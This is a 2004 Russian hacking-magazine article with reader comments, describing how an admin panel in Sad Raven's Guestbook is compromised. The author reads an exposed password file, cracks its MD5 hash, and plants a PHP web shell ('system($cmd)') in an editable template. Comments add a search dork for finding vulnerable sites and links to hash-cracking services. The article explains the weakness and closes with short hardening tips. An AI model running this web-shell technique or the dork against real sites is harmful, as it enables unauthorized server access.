Взлом через Sad Raven`s Guestbook

//21.10.2004 Версия для печати Комментарии | Автор Женя

Однажды, мой друг попросил меня протестировать его сайт на безопасность. Естественно я согласился. Просканировав порты я понял, что нужно искать дырку в скриптах. Чем я и занялся. Но как назло я не смог ничего найти. На сайте практически нет скриптов, а те который есть защищены. Моё внимание привлекла гостевая книга. Дело в том, что все скрипты на сайте были написаны автором, а гостевая нет! Это был скрипт очень популярной гостевой Sad Raven's Guestbook. Протестировал скрипт на популярные ошибки - не судьба, все входные параметры фильтровались... Тогда я скачал исходники и стал разбираться.

Гостевая состоит из 2 модулей, администрирование и собственно сама гостевая. Нас интересует администрирование... Практически сразу я понял, что пароль хранится в зашифрованном виде (MD5).

if (file_exists("passwd.dat") && $QUERY_STRING != ""):
require ("passwd.dat");
if (!isset($alogin) || md5($pass) != $Password[$alogin] ||
!isset($Password[$alogin])):


Пароль хранится в файле passwd.dat. Открыв этот файл в браузере, я увидел:

<?php
$Password['root'] = "7e0c76b830931fc0eca7e69a4a2574db";
?>


Оставалось только расшифровать пароль. Это делается софтиной md5indide. Для взлома необходимо создать текстовый документ и вписать в него следующее:
$Password['root'] = "7e0c76b830931fc0eca7e69a4a2574db";
Далее этот файл открывается в md5inside и расшифровывается Наибольший процент дает перебор по словарю. Через 20 минут у меня был пароль от админки. Если ты думаешь, что я получил только доступ к редактированию сообщений, то сильно заблуждаешься. Я мог редактировать дизайн! Я зашел в этот раздел и увидел, что можно редактировать два файла - header.inc.php и footer.inc.php . Оба отвечают за вид Гостевой. Так вот, расширение у обоих сами видите какое.

Первый файл:

<html>
<head>
<title>Гостевая книга</title>
<meta http-equiv="content-type" content="text/html; charset=windows-1251">
<link rel=stylesheet href=design/guest.css type=text/css>
<script language=JavaScript><!--
var ico;function smile(ico)
{document.Sad_Raven_Guestbook.mess. value=document.Sad_Raven_Guestbook. mess.value+ico;}
//--></script>
</head>
<body bgcolor=<?=$BACKGROUND?> topmargin=15 leftmargin=0 marginwidth=0
marginheight=0>
<div align=center>
<table width=598 border=0 cellspacing=0 cellpadding=2><tr><td>
<table width=598 border=0 cellspacing=1 cellpadding=3
bgcolor=<?=$BORDER?>> <tr><td align=center class=p
bgcolor="<?=$DARK?>"> <b></b></td></tr></table>
</td></tr><tr><td>


Значит я могу выполнять любой php код!!! Остается добавить в конец <?system($cmd);?>. Все! Я получил возможность выполнять ЛЮБЫЕ (на что хватит прав) команды на сервере! Дальше я просто поменял права на index.htm, поставил их равными 0600 ?)). Это самое безобидное, что можно было сделать, сами понимаете. Теперь пару слов о безопасности. Прежде всего не выбирай простые пароли! Берите что-нибудь такое: F^L@C^4_@%$)*#&^&. Замени в файле admin.php <passwd.dat> на что-нибудь бессмысленное, например dsiahfhh.dat. И по возможности не пользуйся чужими скриптами. Если ты неуверен на 100% в безопасности скрипта - удали его и напишите свой!


Следующие статьи
Предыдущие статьи

comments powered by Disqus

UserГость
26.06.2007 17:34:24
Ответить
Что-то непойму: теперь в рубрике будут печатать бравые похождения хакеров? :(((((
UserГость
26.06.2007 17:34:24
Ответить
a cho za proga md5indide ne slihal mojesh opovestvovati
UserГость
26.06.2007 17:34:24
Ответить
Это еще не факт, что тебе дадут посмотреть passwd.dat, т.к. в комплект скрипта входит также файлик .htaccess, который черным по белому запрещает просмотр passwd.dat. Хотя, опять же, не на всех хостингах поддержка .htaccess бывает включена
UserГость
26.06.2007 17:34:24
Ответить
В моем случае не было там этого файла.
UserГость
26.06.2007 17:34:24
Ответить
Че-то я не понял... Ну предположим я получил логин и пароль (другим способом, т.к файл был о запрете). Но че я должен увидеть когда ввел этот код? но не пашет :((( Я с system не так часто встречался и не понимаю че должно быть при его вводе
UserГость
26.06.2007 17:34:24
Ответить
Просто используйте последние версии скриптов. :) В гостевой SR + Denied Guestbook v.2.1.5 вместо passwd.dat используется passwords.php, где в первой строке впендюрено Таким образом, защита двойная - через .htaccess и через php-код внутри файла. Такой фокус уже не пройдет.
UserГость
26.06.2007 17:37:03
Ответить
Шит! В предыдущем сообщении вырезался php-код! ((( Повторю без php-тегов ))) В первой строке впендюрено: php die('Access Denied');
UserГость
04.08.2009 22:55:03
Ответить
Дааа.. пробовал.... получилось XDDD пишеш в гугле filetype:dat passwd и ищеш такие сайты =)
UserГость
08.01.2010 2:27:36
Ответить
Я никогда и не пользовался passwd.dat или password.dat все инклуды ссылаются на gfftyzer.dat c с правами 644. Также не советую называть password.dat хоть если и будет прописано в .htaccess так для подстраховки! ;-)
UserГость
03.01.2011 20:43:03
Ответить
Лучше не касчать а зайти на http://md5.rednoize.com/
там пароль прекрасно расшыфровается
UserГость
06.07.2011 20:25:23
Ответить
класс
UserГость
15.11.2011 12:53:48
Ответить
cgfcb,j
UserГость
09.05.2012 20:53:55
Ответить
да чем так расшифровывать лучше зайти на сайт crackfor.me там напишешь ето и пароль выйдет че парится
UserГость
19.06.2012 8:01:51
Ответить
=\
UserГость
02.08.2012 12:52:08
Ответить
Сайт для хеширования и расшифровка хеша http://md5list.ru/ . Думаю вас заинтересует!

Читай «Хакер» на планшетах!

Свежие материалы каждый месяц в удобном для тебя формате:



Линк рекламодателям

Читай новый номер
В продаже с 2 апреля
  • Лучшие инструменты для создания прототипа твоего первого приложения
  • Разбираемся с главными библиотеками для построения графического интерфейса в мире Java
  • Ретроспектива виртуализации в *nix
  • Тестируем фреймворк для мониторинга Sensu
  • Подбираем утилиты для бэкапа БД
  • Подборка свежих гаджетов для пентестеров
  • Физическая безопасность в ИТ: как ненадежный замок может стать самым слабым местом в системе



Социальные сети

Keywords: zPOSTz zTEXTz, zUPLOADz, zNEWSLINEz z24371z
Для Авторов: edit Lock delete Lock

Автор: Женя
Дата: 21.10.2004 18:18:27©